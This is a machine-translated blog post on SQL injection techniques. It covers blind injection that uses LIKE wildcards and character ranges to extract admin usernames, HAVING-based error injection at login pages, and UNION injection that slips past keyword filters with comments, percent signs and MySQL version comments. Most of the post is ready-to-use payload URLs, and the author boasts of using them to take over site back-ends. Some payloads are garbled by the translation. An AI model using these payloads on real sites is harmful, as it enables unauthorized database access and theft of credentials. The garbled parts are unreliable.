Introduce some injection techniques based on sqlinjection

 

The purpose of writing this article is to record and communicate with each other. You are welcome to criticize and correct all kinds of experts.

 

The traditional injection method is as follows:

And 1 = 1, and 1 = 2 to determine whether the filter is completely true or false. Of course, there are also or 1 = 2, or 1 = 1, or id = 1 + 1 or id = 2-1, etc.

The purpose of this article is not to judge who's testing method is practical, but to recommend some new injection methods, which may have been mentioned earlier.

First, let's judge:

The Null value can be used as follows: and 1 is null, and 1 is not null.

Or: and 2 <= 3

In fact, many people often use = to judge, but, for example, >=, <=, is null, is not null, and <> can be used to determine

For blind sqlinjection, the general injection method is:

Ascii (substring (password,) = 56, or ord (mid (password,) = 56, etc.

In SQL, there is a search function like. We can use table. column to directly lock the field, so that you can directly discard the select, from, where and other keywords to avoid filtering, look at the '_' placeholder demonstration :)

Http: // url/1.asp? String = wooden 'and admin. user like' _ 'and '1' = '1 false

Http: // url/1.asp? String = wooden 'and admin. user like' _ 'and '1' = '1 false

...

Http: // url/1.asp? String = wooden 'and admin. user like' _____ 'and '1' = '1 true

In this way, the field can be precise directly, with 5 placeholders = 5 fields. In the like function, we can use the '-' symbol to retrieve the data range. For example:

Http: // url/1.asp? String = wooden 'and admin. user like' [0-9] ____ 'and '1' = '1 false

Http: // url/1.asp? String = wooden 'and admin. user like' [a-z] ____ 'and '1' = '1 true

Http: // url/1.asp? String = wooden 'and admin. user like' [a-h] ____ 'and '1' = '1 true

Http: // url/1.asp? String = wooden 'and admin. user like' [a-B] ____ 'and '1' = '1 true

Http: // url/1.asp? String = wooden 'and admin. user like' B ____ 'and '1' = '1 false

Http: // url/1.asp? String = wooden 'and admin. user like 'a ____' and '1' = '1 true

Therefore, it can be determined that the first user field in the admin table is a, followed by the same principle, and data is directly cracked through range values.

Remember the sum function? You can apply it directly to determine the data type.

Http: // url/1.asp? String = wooden 'and (sum (admin. user) = 1 and '1' = '1

Of course, some built-in functions of SQL can also be used:

Http: // url/1.asp? String = wooden 'and len (admin. user)> 4 and '1' = '1

Http: // url/1.asp? String = wooden 'and ascii (substring (admin. user, 100)> and '1' = '1

In the witth error mode, you can use 'and (admin. user) = 0 to obtain data.

However, this method is only applicable to the tables and fields of the current query statement, so it is generally suitable for injection at the background login port, with having 1 = 1 (number) or d 'having '1' = '1 (string), helped me win a lot of background :)

Some new functions are also available for mysql, such:

Find_in_set example: find_in_set ('56', ascii (substr (password,) = 1

Strcmp example: strcmp (left ('Password', 1), 0x56) = 1

Let's talk about union. For conventional injection, We Can union select 1, 2, 3, 4 or union/**/select/*/1, 2, 3, 4

For iis, % can be used to bypass such as: union selec % t, 3, 4-% --

For mysql, you can: union select 1 & id = 2, 3 & id = 4

OK when filtering select, union /**//*! Select */1, 2, 4, or union/&/s/**/elec/**/t/**/1, 2, 3, 4

You can even union /**//*! 5100select */1 & id = 2, 3 & id = 4 // 5100 is the mysql version

When the statement is multi-query and cannot be annotated with the following statement:

For example, slect * from table where id = 1 and name = xxx, we can do this:

Id = 1 + union/* & name = */select + 1, 2

In union injection, union can be executed only when the result is flase. For example:

And 1 = 2 union select xxxxxx

You can do this: id = wooden '/*! 5100and */1 is null union /*! 5100select */xxxxx can bypass most of the blacklist mechanisms.

 

This article comes from the dedicated waiting blog